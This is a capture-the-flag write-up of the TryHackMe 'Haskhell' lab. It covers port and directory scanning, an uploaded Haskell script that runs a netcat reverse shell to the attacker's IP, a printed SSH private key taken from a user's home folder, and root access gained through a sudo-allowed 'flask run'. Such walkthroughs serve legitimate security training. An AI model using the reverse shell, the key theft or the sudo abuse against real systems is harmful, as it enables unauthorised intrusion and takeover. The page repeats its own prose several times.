Tryhackme Haskhell

Nmap Scan.

nmap -sV -sC -Pn -p- -T4 hask.thm 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-08 03:30 EDT
Nmap scan report for hask.thm (10.10.129.213)
Host is up (0.16s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1d:f3:53:f7:6d:5b:a1:d4:84:51:0d:dd:66:40:4d:90 (RSA)
|   256 26:7c:bd:33:8f:bf:09:ac:9e:e3:d3:0a:c3:34:bc:14 (ECDSA)
|_  256 d5:fb:55:a0:fd:e8:e1:ab:9e:46:af:b8:71:90:00:26 (ED25519)
5001/tcp open  http    Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Homepage
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 657.29 seconds

From the `Nmap` scan I can see that port `5001` is the only useful port that can be enumerated.

Having a look on the http site @ 5001 I come to see this page

Seeing the hyperlink homework here I clicked on it and it took me to the page where an assignment can be submitted.

Clicking on the submit button it says that `PAGE NOT FOUND`.

Using Gobuster to find the directories of the machine.

Gobuster

root@Ac3:~# gobuster dir -u http://hask.thm:5001/ -w /usr/share/dirb/wordlists/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://hask.thm:5001/
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/08 03:33:08 Starting gobuster
===============================================================
/submit (Status: 200)
===============================================================
2020/07/08 03:36:03 Finished
===============================================================

So it’s not `uploads` but it’s `Submit`.

Tried a bunch of stuff like uploading a `PHP` shell and stuff like that, but nothing seems to be working.

Remembering from previous pages this site probably accepts a haskell scripts.

Reverse shell

A little bit research on haskell I found that we can call a command using the below script.

root@Ac3:~/Haskhell# cat shell.hs 
module Main where

import System.Process

main = callCommand "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.2.148 5566 >/tmp/f"

Uploading the file and starting up a listner `nc -lnvp 5566` and visiting the url `hask.thm/uploads/shell.hs` gave me the reverse shell.

root@Ac3:~/Haskhell# nc -lnvp 5566
listening on [any] 5566 ...
connect to [10.9.2.148] from (UNKNOWN) [10.10.129.213] 44224
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(flask) gid=1001(flask) groups=1001(flask)
$ 

We can use python -c 'import pty;pty.spawn("/bin/bash");' for a shell upgrade.

Getting User.txt

flask@haskhell:/home$ ls
flask  haskell  prof
flask@haskhell:/home$ 
flask@haskhell:/home$ cd prof
cd prof
flask@haskhell:/home/prof$ ls
ls
__pycache__  user.txt
flask@haskhell:/home/prof$ cat user.txt
cat user.txt
flag{--------------}

From here I see a `.ssh` folder which contains the `id_rsa` of professor, So I copied that to my `kali` and used `ssh` to login as `prof`.

flask@haskhell:/home/prof/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA068E6x8/vMcUcitx9zXoWsF8WjmBB04VgGklNQCSEHtzA9cr
94rYpUPcxxxYyw/dAii0W6srQuRCAbQxO5Di+tv9aWXmBGMEt0/3tOE7D09RhZGQ
b68lAFDjSSJaVlVzPi+waotyP2ccVJDjXkwK0KIm6RsACIOhM9GtI2wyZ6vOg4ss
Nb+7UY60iOkcOAWP09Omzjc2q7hcE6CuV6f7+iObamfGlZ4QQ5IvUj0etStDD6iU
WQX4vYewYqUz8bedccFvpC6uP2FGvDONYXrLWWua7wlwSgOqeXXxkG7fxVqYY2++
6ZVm8RE7TpPNxsQNDwpnxOiwTxGMgCrIMxgRVwIDAQABAoIBAQCTLXbf+wQXvtrq
XmaImQSKRUiuepjJeXLdqz1hUpo7t3lKTEqXfAQRM9PG5GCgHtFs9NwheCtGAOob
wSsR3TTTci0JIP4CQs4+nez96DNl+6IUmhawcDfrtlGwwZ/JsvPDYujnyziN+KTr
7ykGoRxL3tHq9Qja4posKzaUEGAjTz8NwrhzB6xatsmcWBV0fFoWzpS/xWzW3i7F
gAoYxc6+4s5bKHsJima2Aj5F3XtHfipkMdBvbl+sjGllgiQn/oEjYMIX5wc7+se2
o7FERO2oy3I5jUOlULsr9BwQpNFA2Qenc4Wc7ghb0LfCVaUs/RHQ7IQ4F3yp/G67
54oLue6hAoGBAPCe+WsnOXzhwQ9WXglhfztDR1lcwSFMeHZpcxYUVqmVEi2ZMLll
B67SCri9lHHyvBtrH7YmZO5Q9UcGXdLCZGmbkJUdX2bjqV0zwwx1qOiVY8LPnZSJ
LJN+0p1dRHsO3n4vTHO8mVuiM5THi6pcgzSTggIhS+e1ks7nlQKiBuD/AoGBAOE2
kwAMtvI03JlkjvOHsN5IhMbOXP0zaRSrKZArDCcqDojDL/AQltQkkLtQPdUPJgdY
3gOkUJ2BCHNlIsAtUjrTj+T76N512rO2sSidOEXRDCc+g/QwdgENiq/w9JroeWFc
g9qM3f2cl/EkjxRgiyuTfK6mbzcuMSveX4LfCXepAoGAd2MZc+4ZWvoUNUzwCY2D
eF8QVqlr9d6gYng9rvXWbfvV8iPxBfu3zSjQQwtlTQhYBu6m5FS2fXxTxrLE+J6U
/cU+/o19WWqaDPFy1IrIjOYagn1KvXk2UdR6IbQ2FyywfkFvmHk6Sjn3h9leVd/j
BcIunmnw5H214s0KpSzJZvcCgYA5Ca9VNeMnmIe+OZ+Swezjfw5Ro3YdkmWsnGTc
ZGqhiJ9Bt91uOWVZuSEGr53ZVgrVlYY0+eqI2WMghp60eUX4LBinb71cihCnrz9S
/+5+kCE51zVoJNXeEmXrhWUNzo7fP6UNNtwKHRzGL/IkwQa+NI5BVVmZahN9/sXF
yWMGcQKBgQDheyI7eKTDMsrEXwMUpl5aiwWPKJ0gY/2hS0WO3XGQtx6HBwg6jJKw
MMn8PNqYKF3DWex59PYiy5ZL1pUG2Y+iadGfIbStSZzN4nItF5+yC42Q2wlhtwgt
i4MU8bepL/GTMgaiR8RmU2qY7wRxfK2Yd+8+GDuzLPEoS7ONNjLhNA==
-----END RSA PRIVATE KEY-----

SSH to Prof

root@Ac3:~/Haskhell# ssh -i id_rsa prof@hask.thm
The authenticity of host 'hask.thm (10.10.129.213)' can't be established.
ECDSA key fingerprint is SHA256:hx58wuaesK7WY+jWhWJdlCKNY2TR3P0MqLqqDTwVtZA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'hask.thm,10.10.129.213' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Jul  8 08:06:37 UTC 2020

  System load:  0.0                Processes:           108
  Usage of /:   26.3% of 19.56GB   Users logged in:     0
  Memory usage: 48%                IP address for eth0: 10.10.129.213
  Swap usage:   0%


39 packages can be updated.
0 updates are security updates.


Last login: Wed May 27 18:45:06 2020 from 192.168.126.128
$ id
uid=1002(prof) gid=1002(prof) groups=1002(prof)

We can use python -c 'import pty;pty.spawn("/bin/bash");' for a shell upgrade.

$ python -c 'import pty;pty.spawn("/bin/bash");'
prof@haskhell:~$ 

Checking the priv of `prof`

prof@haskhell:~$ sudo -l
Matching Defaults entries for prof on haskhell:
    env_reset, env_keep+=FLASK_APP, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User prof may run the following commands on haskhell:
    (root) NOPASSWD: /usr/bin/flask run

Privilege Escalation

prof@haskhell:~$ nano root.py
import os
os.system("/bin/sh")
prof@haskhell:~$ nano root.py
prof@haskhell:~$ export FLASK_APP=root.py
prof@haskhell:~$ sudo flask run
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
flag{*****************}

If you like my work, please do consider giving me +rep on HACKTHEBOX.
My HackTheBox profile: https://www.hackthebox.eu/home/users/profile/291968

Share on

Twitter Facebook LinkedIn

Tryhackme Haskhell

DcodeZer0

Nmap Scan.

From the `Nmap` scan I can see that port `5001` is the only useful port that can be enumerated.

Clicking on the submit button it says that `PAGE NOT FOUND`.

Gobuster

So it’s not `uploads` but it’s `Submit`.

Tried a bunch of stuff like uploading a `PHP` shell and stuff like that, but nothing seems to be working.

Remembering from previous pages this site probably accepts a haskell scripts.

Reverse shell

A little bit research on haskell I found that we can call a command using the below script.

Uploading the file and starting up a listner `nc -lnvp 5566` and visiting the url `hask.thm/uploads/shell.hs` gave me the reverse shell.

Getting User.txt

SSH to Prof

Checking the priv of `prof`

Privilege Escalation

Share on

You may also enjoy

Cobalt Strike Malleable C2 Profiles

Cobalt Strike Redirectors using Apache-SSL

RED-TEAM Home-Lab Infra

Game of Active Directory - Part 3 [Recon]

Tryhackme Haskhell

DcodeZer0

Nmap Scan.

From the Nmap scan I can see that port 5001 is the only useful port that can be enumerated.

Clicking on the submit button it says that PAGE NOT FOUND.

Gobuster

So it’s not uploads but it’s Submit.

Tried a bunch of stuff like uploading a PHP shell and stuff like that, but nothing seems to be working.

Remembering from previous pages this site probably accepts a haskell scripts.

Reverse shell

A little bit research on haskell I found that we can call a command using the below script.

Uploading the file and starting up a listner nc -lnvp 5566 and visiting the url hask.thm/uploads/shell.hs gave me the reverse shell.

Getting User.txt

From here I see a .ssh folder which contains the id_rsa of professor, So I copied that to my kali and used ssh to login as prof.

SSH to Prof

Checking the priv of prof

Privilege Escalation

Share on

You may also enjoy

Cobalt Strike Malleable C2 Profiles

Cobalt Strike Redirectors using Apache-SSL

RED-TEAM Home-Lab Infra

Game of Active Directory - Part 3 [Recon]

From the `Nmap` scan I can see that port `5001` is the only useful port that can be enumerated.

Clicking on the submit button it says that `PAGE NOT FOUND`.

So it’s not `uploads` but it’s `Submit`.

Tried a bunch of stuff like uploading a `PHP` shell and stuff like that, but nothing seems to be working.

Uploading the file and starting up a listner `nc -lnvp 5566` and visiting the url `hask.thm/uploads/shell.hs` gave me the reverse shell.

From here I see a `.ssh` folder which contains the `id_rsa` of professor, So I copied that to my `kali` and used `ssh` to login as `prof`.

Checking the priv of `prof`